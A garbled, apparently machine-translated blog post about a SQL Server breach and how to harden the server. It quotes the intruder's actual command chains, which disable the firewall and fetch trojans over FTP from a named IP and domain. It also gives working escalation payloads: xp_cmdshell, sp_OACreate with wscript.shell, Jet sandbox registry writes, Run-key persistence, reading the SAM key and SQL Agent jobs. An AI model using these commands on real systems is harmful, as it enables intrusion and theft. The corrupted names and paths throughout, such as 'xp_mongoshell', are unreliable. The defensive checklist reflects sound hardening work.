SQL Server injection and security protection

The worker process executes the mongo.com process and generates *. sys and * .batfiles. Then, use ftp.exe to download the trojan file and the anti-virus software generates an alarm. The following is the command executed by mongo.com: WINDOWSsystem32cmd. comcnet1s.

The attacker experienced two zooms of the vulnerability. The sqlserver.exe process executes the mongo.com process and generates *. sys and * .battwo files. Then, use ftp.exe to download the trojan file, and the anti-virus software starts to report an alert. the following is the instruction content of cmd.com: "C:" WINDOWS "system32" cmd.com "/c net1 s.

The attacker experienced two attacks. Every time, the sqlserver.exe process executes the mongo.com process and generates two files, *. sys and * .bat. then, the attacker uses ftp.exe to download the trojan file and then sends an alert to the antivirus software.

The following is the execution instructions of cmd.com.
"C:" WINDOWS "system32" cmd.com "/c net1 stop sharedaccess & echo open 218.61.11.97> dboy. sys & echo 11> dboy. sys & echo 11> dboy. sys & echo get pc.exe C: "boots.exe> dboy. sys & echo bye> dboy. sys & echo ftp-s: dboy. sys> dboy. bat & echo copy C: "boots.exe C:" WINDOWS "system32" inf "test.exe & echo start/high" "C: "WINDOWS" system32 "inf" test.exe & echo start C: "boots.exe> dboy. bat & echo start C: "boots.exe> dboy. bat & echo del dboy. sys> dboy. bat & echo del % 0> dboy. bat & dboy. bat

"C:" WINDOWS "system32" cmd.com "/c SC stop sharedaccess & echo open ddosboy1.3322.org> dboy1.sys & echo dboy> dboy1.sys & echo if> dboy1.sys & echo get dboy1.c: "Windows" tcpsrv1.exe> dboy1.sys & echo bye> dboy1.sys & echo ftp-s: dboy1.sys> system1.bat & echo start C: "Windows" tcpsrv1.exe> system1.bat & echo start C: "Windows" tcpsrv1.exe> system1.bat & echo del dboy1.sys> system1.bat & echo del % 0> system1.bat & system1.bat



After the first poisoning, the SQL server was enhanced and the "xp_mongoshell" SQL server was deleted SecurityThe extended storage process. However, it may take less than a month to complete.
This time, I checked the database log and xp_mongoshell did not recover, but the execution logs of the sp_oacreate and sp_oamethod stored procedures were found in the log.
So surfing the internet Learning, Put your own LearningSome of the following are recorded:
1. Elementary SQL InjectionAttack
When a novice hacker attacks SQL Server, the first method is to execute the xp_mongoshell command in the master database to execute some commands, add users, add files, and add Trojan viruses.
To deal with such hackers, you only need to disable the xp_mongoshell stored procedure.
Xp_cmdshell is a built-in stored procedure that allows you to execute arbitrary command line commands. For example:
Exec master .. xp_mongoshell 'dir'
The directory list in the current working directory of the SQLSERVER process is obtained. :

Exec master.. xp_mongoshell 'net user'
A list of all users on the server is provided. When SQL server runs normally as a system account or domain account, attackers can do more serious harm.

From the two examples above, we can see the powerful functions of xp_mongoshell, which also means the destructive power.
In general, xp_mongoshell is unnecessary for administrators. The elimination of xp_mongoshell will not affect the Server.
You can remove xp_cmdshell:
Use Master
Exec sp_dropextendedproc 'xp _ export shell'
Go

If necessary, you can restore xp_mongoshell back:
Use Master
Exec sp_addextendedproc 'xp _ cmdshell', 'xp log70. dll'
Go

If necessary, you can delete the xplog70.dll file. Back up the file.

Web SQL 2005:

SQL 2005 by default, xp_mongoshell stored procedures cannot be executed,Security?

Enable the xp_cmdshell stored procedure execution permission
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp _ Your shell', 1; RECONFIGURE;
Disable the execution permission of the xp_mongoshell Stored Procedure
EXEC sp_configure 'show advanced options', 1; RECONFIGURE; EXEC sp_configure 'xp _ cmdshell', 0; RECONFIGURE;

Deleting xplog70.dll will affect some functions of "Enterprise Manager". What I encounter is that I cannot view the database server attributes in "Enterprise Manager.

2. Intermediate SQL InjectionAttack
After performing the above operations, you can ProtectionThe SQL server Security? No, this is only applicable LearningSQL InjectionCainiao are only feasible. They can't do it for the middle bird and the old bird. They can do more.
Now let's take a look at intermediate InjectionMethod.
When the database administrator disables xp_mongoshell and deletes the xplog70.dll and file upload function, it is no longer feasible to use xp_mongoshell.
However, Microsoft also provides some other stored procedures to allow medium-level hackers to intrude into the system.
1) Use the OLE object interface
SQL SERVER provides some functions to access OLE objects, including sp_OACREATE and sp_OAMethod,
They can call the OLE Control to indirectly obtain a shell. Use SP_OAcreate to call the wscript object. Shell assigns the variable @ shell, and then uses SP_OAMETHOD to call the @ shell attribute run to execute the command.

DECLARE @ shell INT
EXEC SP_OAcreate 'wscript. shell', @ shell out
EXEC SP_OAMETHOD @ shell, 'run', null, 'net user hack/add'


2) Enable access sandbox Mode
By default, the Jet data engine does not support SQL statements such as select shell ("net user ray/add,
However, after the sandbox mode of the JET engine is enabled, the command can be executed,
Use the xp_regwrite stored procedure to rewrite the registry, use OpenRowSet to ACCESS an ACCESS database file that comes with the system, and then execute the SQL statement that runs the command.

EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software "Microsoft" Jet "4.0" Engines', 'sandboxmode', 'reg _ dword', 3

SandBoxmode value description
The default value is 2,
0 -- indicates that SandBoxmode is always disabled,
1 -- indicates that the SandBoxmode mode is used for non-Acess applications,
2 -- indicates that the access application uses the SandBoxmode mode,
3 -- indicates that it is fully enabled. Security.

Select * From OpenRowSet ('Microsoft. jet. OLEDB.4.0 ','; Database = c: "windows" system32 "ias" ias. mdb ', 'select shell ("net user hack/add ")');


3) write the registry key using stored procedures such as xp_regxxxxx
This method can only be used by sa account or sysadmin account.
Run
Exec xp_regread ''hkey _ LOCAL_MACHINE '', ''security" SAM "Domains" account', ''f''
If you encounter a careless administrator, you may be able to get the Administrator's password.
Add a startup Item or something.
Use xp_regwrite to write the registry key and directly write the command to be executed into the RUN startup key.
EXEC master. dbo. xp_regwrite 'HKEY _ LOCAL_MACHINE ', 'Software "Microsoft" Windows "currentversion" run', 'shell', 'reg _ SZ', 'c: "windows" system32 "cmd.exe/c net user hack/add'

Delete all the extensions if necessary.
Xp_regaddmultistring (add a project to the Registry)
Xp_regdeletekey (delete a key from the Registry)
Xp_regdeletevalue (delete a key value from the Registry)
Xp_regenumvalues (list the key values under the primary key)
Xp_regread (read the key value under a primary key)
Xp_regremovemultistring (delete a project from the Registry)
Xp_regwrite (write data to the Registry)

4) execute commands using SQL proxy
By default, this service is disabled. You can use xp_servicecontrol to enable SQLSERVERAGENT, create an SQL scheduled task, and run the task immediately.

Exec master. dbo. xp_servicecontrol 'start', 'sqlserveragent'
Use msdb exec sp_delete_job null, 'X'
Exec sp_add_job 'X'
Exec sp_add_jobstep Null, 'x', Null, '1', 'cmdexec ', 'cmd/c Dir C :"'
Exec sp_add_jobserver Null, 'x', @ servername exec sp_start_job 'X'

Except for the four MethodIn addition, there are other MethodBut I don't know much about it, so I won't list them all.

3. obtain other system information

Calendar directory
Exec master. dbo. xp_dirtree 'C :"'
Retrieve sub-Directories
Exec master. dbo. xp_subdirs 'C :"'
List available system partitions
Exec master. dbo. xp_availablemedia
Determine whether a directory or file exists
Exec master.. xp_fileexist 'C: "boot. ini'
And so on.

Iv. Advanced InjectionTechnology
For advanced InjectionI did not find any related technologies on the Internet. LearningMaterials, I think these technologies should also be spread in a small group of people. So there is no way to start talking about it.


V. Defense Against SQL InjectionKey points and Methods
1. confirm that the latest patches for windows and SQL Server are installed.
2. evaluate and select the largest SecurityNetwork protocol that does not affect the function at the same time. Multi-Protocol is a wise choice, but it is sometimes not used in a heterogeneous environment.
Note: Remove unnecessary network protocols if possible.
3. Set strong passwords for "sa" and accounts with "sysadmin" permissions to enhance their Security. What is a strong password? I personally think it is a combination of letters, numbers, and special characters, many 8 characters.
4. Use a low-privilege user as the account for querying SQL Server services. Do not use LocalSystem or sa.
This low-permission account should have only the minimum permissions and restrict the account's query and access operations on SQL Server. You can use the minimum permission to query many things in SQL server. If not, do not grant additional permissions.
Note: When you use the Enterprise Manager for the above settings, the permissions on the file, registry, and user rights are processed.

5. determine all SQL server data, and the system file is mounted to the NTFS partition and "Directory Access Control" is applied.
If someone gets access to the system, this level of permission can prevent intruders from damaging data and avoid causing a disaster.

6. If you do not need xp_mongoshell, disable it. Add it back if needed.
In fact, this is also not good-if an intruder finds that it is not there, it only needs to add it back. Consider that you can remove the following dll, but you must test it before removing it because some dll files are used by some programs at the same time.
To find out whether other programs use the same dll, perform the following steps:
First obtain the dll:
Select o. name, c. text from dbo. syscomments c, dbo. sysobjects o where c. id = o. id and o. name = 'xp _ Your shell'
Second, use the same dll to find whether other extended storage operations use the dll:
Select o. name, c. text from dbo. syscomments c, dbo. sysobjects o where c. id = o. id and c. text = 'xplog70. dll'
You can use the same method to process other processes you want to remove in the following steps.

7. Disable object connection and embed Automated Storage programs if not needed (warning-some Enterprise Manager functions may be lost when these storage programs are disabled). These stored procedures are as follows:
Sp_OACreate
Sp_OADestroy
Sp_OAGetErrorInfo
Sp_OAGetProperty
Sp_OAMethod
Sp_OASetProperty
Sp_OAStop
If you decide to stop these stored procedures, please write a script for them so that you can re-add them when you use them later.

8. Disable Registry Stored Procedures that you do not need. (As mentioned above) These include:
Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumvalues
Xp_regremovemultistring
Note: the removal of the xp_regread/xp_regwrite stored procedures affects the installation of logs and SP, so their removal is not recommended.


9. Remove other system storage processes that you think pose a threat. This kind of storage process is quite a lot, and they will waste some cpu time.
Be careful not to do this on a configured server first. First, test on the developed machine and confirm that this will not affect any system functions. Below are some of the lists we recommend for your evaluation:
Sp_sdidebug
Xp_availablemedia
Xp_mongoshell
Xp_deletemail
Xp_dirtree
Xp_dropwebtask
Xp_dsninfo
Xp_enumdsn
Xp_enumerrorlogs
Xp_enumgroups
Xp_enumqueuedtasks
Xp_eventlog
Xp_findnextmsg
Xp_fixeddrives
Xp_getfiledetails
Xp_getnetname
Xp_grantlogin
Xp_logevent
Xp_loginconfig
Xp_logininfo
Xp_makewebtask
Xp_msver xp_perfend
Xp_perfmonitor
Xp_perfsample
Xp_perfstart
Xp_readerrorlog
Xp_readmail
Xp_revokelogin
Xp_runwebtask
Xp_schedulersignal
Xp_sendmail
Xp_servicecontrol
Xp_snmp_getstate
Xp_snmp_raisetrap
Xp_sprintf
Xp_sqlinventory
Xp_sqlregister
Xp_sqltrace
Xp_sscanf
Xp_startmail
Xp_stopmail
Xp_subdirs
Xp_unc_to_drive
Xp_dirtree


10. Remove the database's guest account to exclude unauthorized users. The exception is the master and tempdb databases, because they are required for their guest accounts.

11. If not required, disable SQL mail completely. Its existence makes it possible for potential attackers to deliver potential trojans, viruses, or simply implement a DOS attack.

12. Record all user access information. Perform these settings from the Enterprise Manager or log in to the sa to access the following items of the query Analyzer:
Xp_instance_regwrite N 'HKEY _ LOCAL_MACHINE ', N 'Software "Microsoft" MSSQLServer "MSSQLServer', N 'auditlevel', REG_DWORD, 3

13. Create a scheduled task to run:
Then redirect the output to a text file or email, so you monitor failed login attempts.
This also provides a good method for system administrators to record attacks. There are also many third-party tools used to analyze NT log events.
Note: you may need to change the path to your SQL installation path.

14. set an alarm for illegal access and logon Failure logs. Go to "Manager SQL Server Messages" in Enterprise Manager to search for any Messages with no access permission.
(Starting from searching for "login failed" and "denied"). make sure all the information you are interested in is recorded in the event log. Then, an alert is set on the information to send an email or message to an operator who can respond promptly to the problem.

15. Regular inspection teams or all members of the role are determined to assign permissions to the group, so that your audit work can be simplified. Make sure that when you are there, the public group cannot select from the system table.

16. Take some time to audit requests logging in with a blank password. Use the following code to check the empty password:
Select
Password ,*
From syslogins
Where password is null
Order by name


17. Check the access process and extended storage process permissions of all non-sa users. Use the following query to regularly query which process has the public storage permission:
Use master
Select sysobjects. name
From sysobjects, sysprotects
Where sysprotects. uid = 0
AND xtype in ('x', 'P ')
AND sysobjects. id = sysprotects. id
Order by name

18. The IntegratedSecurityPolicy. In the past, enterprise managers were found in the StandardSecurityStore the "sa" password in the modal mode in plaintext of the Registry. Note: Even if you change the mode, the password will remain in the registry.

Web SQL 2000:

Use regedit and check the key:
HKEY_USERS "{yourSID}" software "Microsoft" Microsoft SQL server "80" tool "SQLEW" registered server X "SQL server group
("SQL server group" is the default value, but you may have created a user group to change its location accordingly)

SQL 2005 has not written the sqlew key in the registry.

19. Create SecurityReview Plan, one copy per month SecurityReports: reports available to IT directors include database modifications, successful attacks, backup protection, and Object Access failure statistics in the new development content.

20. Do not allow users to log on to SQL Server interactively. This rule applies to any server. Once a user can interactively enter a server, the administrator privilege can be obtained.

Finally, I didn't know how the other party got the dynamic IP address on my development machine.